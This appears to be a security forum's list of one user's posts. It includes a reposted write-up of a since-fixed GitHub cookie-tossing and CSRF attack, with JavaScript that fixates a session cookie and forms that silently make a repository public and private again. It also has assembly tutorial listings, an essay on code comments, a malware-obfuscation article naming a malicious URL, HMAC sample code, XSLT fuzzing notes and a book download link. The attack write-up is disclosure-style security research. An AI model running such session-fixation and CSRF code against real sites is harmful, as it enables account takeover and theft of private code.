Everything posted by Nytro

  1. [h=3]Hacking Github with Webkit[/h]

Personal: EgorHomakov.com, Consulting: Sakurity

[h=2]Friday, March 8, 2013[/h]

Previously on Github: XSS, CSRF (my GitHub followers are real; I gained followers using CSRF on Bitbucket), access bypass, mass assignments (2 Issues Reported forever), JSONP leaking, open redirect...

TL;DR: Github is vulnerable to cookie tossing. We can fixate the _csrf_token value using a Webkit bug and then execute any authorized request.

Github Pages

Plain HTML pages can be served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea:

- If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain.
- Surprise: Javascript code can set cookies for the whole *.site.com zone, including the main website.

[h=2]Webkit & cookies order[/h]

Our browsers send cookies this way:

Cookie: _gh_sess=ORIGINAL; _gh_sess=HACKED;

Please keep in mind that the Original _gh_sess and the Dropped _gh_sess are two completely different cookies! They only share the same name, and there is no way to tell which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for Ruby web applications) uses the first one:

cookies.each { |k,v| hash[k] = Array === v ? v.first : v }

Here's another thing: Webkit (Chrome, Safari, and the new guy, Opera) orders cookies not by Domain (Domain=github.com must go first), and not even by httpOnly (those should obviously go first). It orders them by creation time (I might be wrong here, but this is how it looks). First of all, let's have a look at the HACKED cookie.
PROTIP: save it as decoder.rb and decode sessions faster:

require 'uri'
require 'base64'
p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first)))

ruby decoder.rb
BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b
{:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="}

On a subdomain we create _gh_sess=HACKED; Domain=.github.com and call window.open('https://github.com').

Browser sends: Cookie: _gh_sess=ORIGINAL; _gh_sess=HACKED;
Server responds: Set-Cookie: _gh_sess=ORIGINAL; httponly ...

This made our HACKED cookie older than the freshly received ORIGINAL cookie. Repeat the request: window.open('https://github.com').

Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL;
Server responds: Set-Cookie: _gh_sess=HACKED; httponly ...

Voila, we fixated it in the Domain=github.com httponly cookie. Now both the Domain=.github.com and Domain=github.com cookies have the same HACKED value. Destroy the Dropped cookie and the mission is accomplished:

document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';

Initially I was able to break login (a 500 error for every attempt). I had some fun on Twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present). It will make you a guest user (logged out), but after logging in the values will remain the same.

[h=2]Steps:[/h]

Let's choose our target. We discussed the XSS-privileges problem on Twitter a few days ago. Any XSS on Github can do anything: e.g. open source or delete a private repo. This is bad, and the Pagebox technique or domain-splitting would fix it. We don't need XSS now since we fixated the CSRF token. (A CSRF attack is almost as serious as XSS. The main advantage of XSS is that it can read responses; CSRF is write-only.)
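As an aside, the Rack behavior quoted above (first cookie wins when two cookies share a name) is easy to demonstrate. Here is a minimal Python sketch of a first-occurrence-wins cookie parser — a hypothetical illustration, not Rack's actual code:

```python
# Minimal sketch (hypothetical parser): like Rack, keep only the FIRST
# value seen for each cookie name, so whichever duplicate the browser
# sends first wins.
def parse_cookies(header):
    jar = {}
    for pair in header.split("; "):
        name, _, value = pair.partition("=")
        jar.setdefault(name, value)  # first occurrence wins
    return jar

# Before the refresh trick: the legitimate cookie is sent first.
print(parse_cookies("_gh_sess=ORIGINAL; _gh_sess=HACKED"))
# -> {'_gh_sess': 'ORIGINAL'}

# After two reloads, HACKED is the older cookie and is sent first.
print(parse_cookies("_gh_sess=HACKED; _gh_sess=ORIGINAL"))
# -> {'_gh_sess': 'HACKED'}
```

This is exactly why Webkit's creation-time ordering matters: the attacker only has to make his cookie the one that is serialized first.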
So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber. I send an email to the Githubber: "Hey, check out this new HTML5 puzzle! http://blabla.github.com/html5_game". The Githubber opens the game and it executes the following javascript, which replaces his _gh_sess with HACKED (session fixation):

document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;';
x=window.open('https://github.com/');
setTimeout(function(){
  x2=window.open('https://github.com/');
},3000);
setTimeout(function(){
  x.close() && x2.close();
  document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
  //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=
  //insert <script src="/done.js"> every 1 second
},10000);
done=function(v){
  if(v){
    //make repo private again
  }else{
    //keep trying to open source
  }
}

The HACKED session is user_id-less (a guest session). It simply contains session_id and _csrf_token; no particular user is specified there. So the Game asks him explicitly: please star us on Github (or something like this) <link>. He may feel a little confused at being logged out. Anyway, he logs in again. The user_id in the session belongs to the Githubber, but the _csrf_token is still ours! Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default, meaning: keep submitting the form to the iframe:

<form target=irf action="https://github.com/github/github/opensource" method="post">
  <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>

At the same time, every 1 second, I execute on my machine:

git clone git://github.com/github/github.git

As soon as the repo is open sourced, my clone request will be accepted. Then I change /done.js to "done(true)".
This makes the Evil game submit a similar form and make github/github private again:

<form target=irf action="https://github.com/github/github/privatesource" method="post">
  <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>

The Githubber replies "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, and his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=. Forever. (Only a cookies reset will update it.) Btw, I don't like how cookies work.

Fast fix: Github now expires the Domain=.github.com cookie if two _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. A proper fix would be to use githubpages.com or another separate domain. Blogger uses blogger.com as the dashboard and blogspot.com for blogs.

Last time I promised to publish an OAuth security insight. This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy).

P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps tumblr has a similar issue; I didn't bother to check.

Posted by Egor Homakov at 8:33 PM

Sursa: Egor Homakov: Hacking Github with Webkit
  2. Some dark corners of C. A presentation that every C programmer should see: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
  3. Practical x64 Assembly and C++ Tutorials, by WhatsACreel. A 55-part playlist (view counts as archived):

1. (10:48, 1,127 views)
2. Intro, briefly how to call x64 ASM from C++ (9:19, 14,821 views)
3. Integer data types so we're all on the same page (11:33, 3,242 views)
4. Intro to Registers, the 8086 (9:25, 3,180 views)
5. This one is about the 386 and 486 register sets (7:59, 2,190 views)
6. Finally we get to our modern x64 register set (12:01, 2,334 views)
7. We'll look at a few useful instructions today (13:13, 2,539 views)
8. This one is about the important debugging windows in Visual Studio 2010 Express (11:58, 4,492 views)
9. Today we'll look at Jumps, Labels and Comparing operands (12:28, 2,077 views)
10. This one is how to pass integer parameters via the registers and return them in RAX (11:41, 2,229 views)
11. Some instructions for performing boolean logic (13:20, 1,835 views)
12. Pointers, Memory and the Load Effective Address Instruction (14:39, 2,052 views)
13. Planning prior to programming a small but useful algorithm to Zero an array (9:18, 1,913 views)
14. This is the programming of the algorithm we went through above (10:12, 1,993 views)
15. Intro to reserving space in the data segment (11:56, 1,438 views)
16. This one is about 4 shift instructions, SHL, SHR, SAL and SAR (12:57, 2,362 views)
17. We'll look at the rather strange double precision shifts SHLD and SHRD (13:54, 1,140 views)
18. Some rotate instructions, ROL, ROR, RCL and RCR (13:31, 1,528 views)
19. The Multiplication and Division instructions (20:32, 1,885 views)
20. Flags register and conditional moves and jumps (19:04, 1,724 views)
21. Addressing modes from registers and immediates to SIB pointers (16:50, 1,775 views)
22. Intro to image processing (16:04, 1,821 views)
23. This is the C++ image processing one (19:43, 2,455 views)
24. This is C++ adjust brightness (23:41, 1,346 views)
25. This is the Assembly version of the adjust brightness algorithm (13:14, 746 views)
26. This is the Assembly version of the adjust brightness algorithm (23:51, 1,136 views)
27. Introduction to the stack (22:32, 3,216 views)
28. Calling a C++ function from ASM (17:42, 1,498 views)
29. Intro to the rather daunting stack frame (31:39, 2,416 views)
30. The test instruction is an AND but doesn't set the answer in op1 (16:26, 956 views)
31. Testing single bits from a bit array (18:18, 893 views)
32. Many little misc. instructions (14:47, 1,046 views)
33. Three tutorials on the string instructions (19:40, 779 views)
34. Three tutorials on the string instructions (17:10, 598 views)
35. Three tutorials on the string instructions (10:54, 719 views)
36. This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition (17:04, 505 views)
37. We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int) (17:39, 538 views)
38. This one is the Euclidean Algorithm (21:26, 710 views)
39. We've finally made it through most of the regular x86 instruction set, now for something completely different (12:18, 718 views)
40. Introducing the CPUID instruction (24:11, 1,315 views)
41. A general intro to MMX and a couple of the instructions (21:36, 801 views)
42. The addition and subtraction instructions in MMX (18:46, 691 views)
43. Multiplication instructions in MMX (17:51, 765 views)
44. Bit shifting in MMX (20:33, 904 views)
45. (20:32, 543 views)
46. (20:15, 590 views)
47. (21:23, 569 views)
48. (13:28, 741 views)
49. (19:45, 911 views)
50. (29:39, 961 views)
51. (17:18, 459 views)
52. (30:08, 342 views)
53. (33:59, 596 views)
54. (21:10, 411 views)
55. (12:40, 239 views)

Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
  4. [h=1]Yes, your code does need comments.[/h]

I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, let's qualify that.

def somefunction(a, b):
    # add a to b
    c = a + b
    # return the result of a + b
    return c

I understand this is a contrived example, but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write.

"Code is far better at describing what code does than English, so just write clear code."

This is usually the blowback you get from comments like the ones above. I don't disagree; programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable, comments are unneeded or don't have a place in modern software development. So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation: comments that explain what a complex piece of code does, and most importantly what an entire function or class does and why it exists in the first place. So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt:

class Relay(object):
    """
    Used to talk to your "relay server" or smart host, this is probably
    the most important class in the handlers next to the
    lamson.routing.Router. It supports a few simple operations for
    sending mail, replying, and can log the protocol it uses to stderr
    if you set debug=1 on __init__.
    """

    def __init__(self, host='127.0.0.1', port=25, username=None, password=None,
                 ssl=False, starttls=False, debug=0):
        """
        The hostname and port we're connecting to, and the debug level
        (defaults to 0). Optional username and password for SMTP
        authentication. If ssl is True, smtplib.SMTP_SSL will be used.
        If starttls is True (and ssl False), the SMTP connection will be
        put in TLS mode. It does the hard work of delivering messages to
        the relay host.
        """
        self.hostname = host
        self.port = port
        self.debug = debug
        self.username = username
        self.password = password
        self.ssl = ssl
        self.starttls = starttls
        ...

This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the Lamson code and see some good-looking Python code, but also some usefully documented code.

[h=2]So hold on. Why are we writing comments?[/h]

Why are we writing comments if we write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand? In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand the intent of that particular code at that moment in time, which may be very different from the intent of the code at the time of its original writing.

[h=2]Writing comments captures intent.[/h]

Writing comments captures the original meaning of the code. Python has docstrings for this; other languages have comparable options. What is so good about docstring-type comments? In conjunction with unambiguous class and function names, they can easily describe the original intent of your code. Why is capturing the original intent of your code important? It allows a developer, at a glance, to look at a piece of code and know why it exists. It reduces situations where a piece of code's original intent isn't clear, then gets modified and leads to unintended regressions. It reduces the amount of context a developer must hold in his/her mind to solve any particular problem that may be contained in a piece of code. Writing comments to capture intent is like writing tests to prove that your software does what is expected.

[h=2]Where do we go from here?[/h]

The first step is to realize that the documentation/comments accompanying a piece of code can be just as important as the code itself and need to be maintained as such. Just like code can become stale if you don't keep it updated, so do comments. If you update some code, you must update the accompanying comments/documentation or they become useless and can lead to more developer error than not having comments at all. So we have to treat comments and documentation as first-class citizens. Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement, but we can cover most issues with some steadfast rules:

- Never name your classes and functions ambiguously.
- Always use inline comments on code blocks that are complicated or may appear unclear.
- Always use descriptive variable names.
- Always write comments describing the intent or reason why a piece of code exists.
- Always keep comments up to date when editing commented code.

As you can see from the points above, code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers.

Sursa: Yes, your code does need comments. - Mike Grouchy
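To make the contrast with the somefunction example concrete, here is a small hypothetical function (name and rationale invented for illustration) whose docstring records the "why" rather than restating the code:

```python
def prune_stale_sessions(sessions, max_age):
    """Remove sessions older than max_age seconds.

    We prune lazily on read rather than with a background sweeper
    because the session store is shared between workers and a sweeper
    would need cross-process locking. (Hypothetical rationale -- the
    point is that the comment records intent, not mechanics.)
    """
    return [s for s in sessions if s["age"] <= max_age]

print(prune_stale_sessions([{"age": 10}, {"age": 99}], max_age=60))
```

A line-by-line `# filter the list` comment would add nothing here; the docstring's second sentence is the part a future maintainer cannot recover from the code alone.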
  5. BackTrack 5 Cookbook

Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5.

Willie Pritchett, David De Smet

- Learn to perform penetration tests with BackTrack 5
- Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 tools
- Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so-popular tools

In Detail

BackTrack is a Linux-based penetration testing arsenal that helps security professionals perform assessments in a purely native environment dedicated to hacking. It is a distribution based on Debian GNU/Linux, aimed at digital forensics and penetration testing, and is named after backtracking, a search algorithm. "BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, privilege escalation, and covering your tracks. The book begins by covering the installation of BackTrack 5 and setting up a virtual environment in which to perform your tests. We then dip into recipes involving the basic principles of a penetration test, such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike.

What you will learn from this book:

- Install and set up BackTrack 5 on multiple platforms
- Customize BackTrack to fit your individual needs
- Exploit vulnerabilities found with Metasploit
- Locate vulnerabilities with Nessus and OpenVAS
- Several solutions to escalate privileges on a compromised machine
- Learn how to use BackTrack in all phases of a penetration test
- Crack WEP/WPA/WPA2 encryption
- Learn how to monitor and eavesdrop on VoIP networks

Download: https://cdn.anonfiles.com/1358842982481.pdf

Sursa: Data 4 Instruction: BackTrack 5 Cookbook
  6. Obfuscation: Malware's best friend

By Joshua Cannell, March 8, 2013, in Malware Intelligence

Here at Malwarebytes, we see a lot of malware. Whether it's a botnet used to attack web servers or ransomware stealing your files, much of today's malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis: some examples include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.

Despite advances in modern malware, dirty programs can't hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware's internals, a technique used in nearly every malware is binary obfuscation.

Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don't want their programs being reverse-engineered or pirated. Its implementation can be as simple as a few bit manipulations or as advanced as cryptographic standards (i.e. DES, AES, etc.). In the world of malware, it's useful to hide the significant words a program uses (called "strings") because they give insight into the malware's behavior. Examples of such strings would be malicious URLs or registry keys. Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer. Let's see some practical obfuscation examples used in a lot of malware today.

Scenario 1: The exclusive or operation (XOR)

The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation. This is because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data. [Image: obfuscated data is unreadable in its current form.] In its current form, the data is unreadable. But when we apply an XOR value of 0x55, we see something else entirely. [Image: an XOR operation using 0x55 reveals a malicious URL.] Now we have our malicious URL. It looks like this malware contacts "http://tator1157.hostgator.com" to retrieve the file "bot.exe".

This form of obfuscation is typically very easy to defeat. Even if you don't have the XOR key, programs exist to manually cycle through every possible single-byte XOR value in search of a particular string. One popular tool available on both UNIX and Windows platforms is XORSearch, written by Didier Stevens. This tool searches for strings encoded in multiple formats, including XOR. Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach: performing an XOR against data with a particular value and then making a second pass with another value. A separate (although equally effective) technique commonly used is to increment the XOR value in a loop. Using the previous example, we could XOR the letter 'h' with 0x55, then the letter 't' with 0x56, and so on. This would also defeat common XOR detection programs.

Scenario 2: Base64 encoding

Base64 encoding has been used for a long time to transfer binary data (machine code) over a system that only handles text. As the name suggests, its encoding alphabet contains 64 characters, with the equal sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the string pointing to the svchost.exe file, used by Windows to host services. [Image: Base64 is commonly used in malware to disguise text strings.] While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and via downloaded programs. Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders. This allows for a custom encoding routine that is more difficult to break.

Scenario 3: ROT13

Perhaps the simplest of the three techniques that's commonly used is ROT13. ROT is an ASM instruction for "rotate", hence ROT13 means "rotate 13". ROT13 uses simple letter substitution to achieve obfuscated output. Let's start by encoding the letter 'a'. Since we're rotating by thirteen, we count the next thirteen letters of the alphabet until we land at 'n'. That's really all there is to it! [Image: ROT13 uses a simple letter substitution to jumble text.] The image above shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15.

Scenario 4: Runtime packers

In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware's code until it is placed in memory. This type of obfuscation is achieved using what's known as a packer program. A packer is a piece of software that takes the original malware file and compresses it, thus making all the original code and data unreadable. At runtime, a wrapper program takes the packed program and decompresses it in memory, revealing the program's original code. Packers have been used for a long time for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers. Fortunately, we aren't without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEiD (no longer developed, but still available for download). [Image: Exeinfo PE is a great tool for detecting common packers.] However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware's contents. This approach defeats modern unpacking scripts and forces reversers to manually unpack the file to see what the program is doing. Even rarer, sometimes malware authors will twice-pack their files, first with a commercial packer and then with their own custom packer.

Conclusion

While this list of techniques is certainly not exhaustive, hopefully it has provided a better understanding of how malware hides itself in plain sight. Obfuscation is a highly reliable technique that's used to hide file contents, and sometimes the entire file itself if a packer program is used. Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well aware of this. Our staff has years of experience in fighting malware and goes to great lengths to see what malicious files are really doing. Bring it on, malware. Do your worst!

Sursa: Obfuscation: Malware's best friend | Malwarebytes Unpacked
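The XOR and ROT13 tricks described in Scenarios 1 and 3 above are easy to reproduce. Here is a minimal Python sketch; the URL and registry string are made-up samples, not artifacts from real malware:

```python
import codecs

def xor(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (key 0-255)."""
    return bytes(b ^ key for b in data)

# Brute-force a single-byte XOR key by scanning for a known plaintext
# marker ("http") -- the same idea tools like XORSearch use.
blob = xor(b"http://example.com/bot.exe", 0x55)  # sample data, not real malware
for key in range(256):
    if b"http" in xor(blob, key):
        print(f"key=0x{key:02x} ->", xor(blob, key).decode())
        break

# ROT13 is a fixed letter substitution; Python ships a codec for it.
# "Fbsgjner\Zvpebfbsg" decodes to a Software\Microsoft-style path.
print(codecs.decode("Fbsgjner\\Zvpebfbsg", "rot13"))
```

The incrementing-XOR variant the article mentions would replace the fixed `key` with `key + i` for byte index `i`, which is why single-key scanners miss it.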
  7.
[h=1]HMAC MD5/SHA1[/h]

Author: [h=3]RosDevil[/h]

Hi people, this is a correct usage of Windows' WINCRYPT APIs to perform HMAC MD5/SHA1. The examples shown on MSDN aren't correct and have some bugs, so I decided to share a correct example.

#include <iostream>
#include "windows.h"
#include <wincrypt.h>

#ifndef CALG_HMAC
#define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC)
#endif
#ifndef CRYPT_IPSEC_HMAC_KEY
#define CRYPT_IPSEC_HMAC_KEY 0x00000100
#endif

#pragma comment(lib, "crypt32.lib")

using namespace std;

char * HMAC(char * str, char * password, DWORD AlgId);

typedef struct _my_blob {
    BLOBHEADER header;
    DWORD len;
    BYTE key[0];
} my_blob;

int main(int argc, _TCHAR* argv[])
{
    char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1);
    char * hash_md5 = HMAC("ROSDEVIL", "password", CALG_MD5);
    cout << "Hash HMAC-SHA1: " << hash_sha1 << " ( " << strlen(hash_sha1) << " )" << endl;
    cout << "Hash HMAC-MD5: " << hash_md5 << " ( " << strlen(hash_md5) << " )" << endl;
    cin.get();
    return 0;
}

char * HMAC(char * str, char * password, DWORD AlgId = CALG_MD5)
{
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    HCRYPTKEY hKey = 0;
    HCRYPTHASH hHmacHash = 0;
    BYTE * pbHash = 0;
    DWORD dwDataLen = 0;
    HMAC_INFO HmacInfo;
    int err = 0;

    ZeroMemory(&HmacInfo, sizeof(HmacInfo));
    if (AlgId == CALG_MD5) {
        HmacInfo.HashAlgid = CALG_MD5;
        pbHash = new BYTE[16];
        dwDataLen = 16;
    } else if (AlgId == CALG_SHA1) {
        HmacInfo.HashAlgid = CALG_SHA1;
        pbHash = new BYTE[20];
        dwDataLen = 20;
    } else {
        return 0;
    }
    ZeroMemory(pbHash, dwDataLen);

    char * res = new char[dwDataLen * 2 + 1];  // hex digest + terminator

    my_blob * kb = NULL;
    DWORD kbSize = sizeof(my_blob) + strlen(password);
    kb = (my_blob*)malloc(kbSize);
    kb->header.bType = PLAINTEXTKEYBLOB;
    kb->header.bVersion = CUR_BLOB_VERSION;
    kb->header.reserved = 0;
    kb->header.aiKeyAlg = CALG_RC2;
    memcpy(&kb->key, password, strlen(password));
    kb->len = strlen(password);

    if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL,
                             CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)) { err = 1; goto Exit; }
    if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)) { err = 1; goto Exit; }
    if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)) { err = 1; goto Exit; }
    if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)) { err = 1; goto Exit; }
    if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)) { err = 1; goto Exit; }
    if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)) { err = 1; goto Exit; }

    ZeroMemory(res, dwDataLen * 2 + 1);
    char * temp;
    temp = new char[3];
    ZeroMemory(temp, 3);
    for (unsigned int m = 0; m < dwDataLen; m++) {
        sprintf(temp, "%2x", pbHash[m]);
        // These two lines are corrections to the hex conversion: sometimes the
        // zeros are printed as spaces, so we replace spaces with zeros
        // (this mainly occurs with HMAC-SHA1).
        if (temp[1] == ' ') temp[1] = '0';
        if (temp[0] == ' ') temp[0] = '0';
        strcat(res, temp);
    }
    delete [] temp;

Exit:
    free(kb);
    if (hHmacHash) CryptDestroyHash(hHmacHash);
    if (hKey) CryptDestroyKey(hKey);
    if (hHash) CryptDestroyHash(hHash);
    if (hProv) CryptReleaseContext(hProv, 0);
    if (err == 1) {
        delete [] res;
        return "";
    }
    return res;
}

// Note: using HMAC-MD5 you could perform the famous CRAM-MD5 used to
// authenticate to SMTP servers.

Sursa: HMAC MD5/SHA1 - rohitab.com - Forums
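For quick cross-checking of output like the above, the same HMAC values can be computed with Python's standard hmac module (same sample message "ROSDEVIL" and key "password" as the C++ program):

```python
import hashlib
import hmac

# Same sample message and key as the WINCRYPT example above.
msg = b"ROSDEVIL"
key = b"password"

# hmac.new(key, msg, digestmod) implements RFC 2104 HMAC directly.
print("HMAC-MD5: ", hmac.new(key, msg, hashlib.md5).hexdigest())
print("HMAC-SHA1:", hmac.new(key, msg, hashlib.sha1).hexdigest())
```

Comparing a native implementation against a known-good library like this is an easy way to catch bugs such as the space-vs-zero hex formatting issue the post mentions.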
  8. [h=2]Monday, 25 February 2013, 17:26:37 (UTC+0100)[/h]

[h=3]Mutation-based fuzzing of XSLT engines[/h]

Intro

In 2011 I did some research on vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This led to a few vulnerabilities (mainly access to the file system or code execution) in Webkit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, ... In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoCs affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog post is mainly to show XML newbies what pathological XSLT looks like. Of course, exploit writers may find some useful information too.

When fuzzing XSLT engines by providing malformed XSLT stylesheets, at least three distinct components are tested:
- the XML parser itself, as an XSLT stylesheet is an XML document
- the XSLT interpreter, which needs to compile and execute the provided code
- the XPath engine, because attributes like "match" and "select" use it to reference data

Given that dumb fuzzing is used, the generation of test cases is quite simple. Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using, among other things, grammar-based generation) is on the way and already gives promising results ;-) PoCs were minimized manually, given that the template structure and execution flow of XSLT don't work well with minimizers like tmin or delta.

Intel SOA Expressway XSLT 2.0 Processor

Intel offered an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even though it has minor real-world relevance. In my opinion, the first bug should have been detected during functional testing.
When idiv (available in XPath 2.0) is used with 1 as the denominator, a optimization/shortcut is used. But it seems that someone has confused the address and the value of the corresponding numerator variable. Please note that the value of the numerator corresponds to 0x41424344 in hex. Articol: http://www.agarri.fr/blog/index.html
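The mutation step described above (Radamsa producing packs of mutated stylesheets from a seed pool) can be approximated with a trivial byte-substitution mutator. This is only an illustrative sketch, not Radamsa's actual algorithm; the seed stylesheet below is a made-up minimal example:

```python
import random

def mutate(seed: bytes, n_flips: int = 4, rng=None) -> bytes:
    """Return a copy of `seed` with a few random byte substitutions."""
    rng = rng or random.Random()
    data = bytearray(seed)
    for _ in range(n_flips):
        pos = rng.randrange(len(data))
        data[pos] = rng.randrange(256)  # overwrite one byte with a random value
    return bytes(data)

# Generate a pack of 100 mutated stylesheets from one seed, as in the post's setup.
seed = (b'<xsl:stylesheet version="1.0" '
        b'xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
        b'<xsl:template match="/"/></xsl:stylesheet>')
rng = random.Random(1337)  # fixed seed so a crashing case can be regenerated
pack = [mutate(seed, rng=rng) for _ in range(100)]
```

Each mutated case would then be fed to the target engine (e.g. its command-line XSLT processor) under a crash monitor, with manual minimization once a crash reproduces.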
9. A few ideas: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
10. It's crap. Do Linux, Android, iOS, Mac OS X, Firefox OS or Chrome OS make you select a browser? Maybe I want Internet Explorer on Linux, through Wine; I want to be asked to choose!
11. Not worth the money, nothing special...
12. Given how complicated these things are, the money is on par. But how the companies cooperate also matters. VUPEN's CEO (the best in "exploit development", in my opinion) stated that Microsoft no longer wants to buy their 0-days (the IE10-on-Win8 one), so these will end up with governments instead. Which is not OK at all.
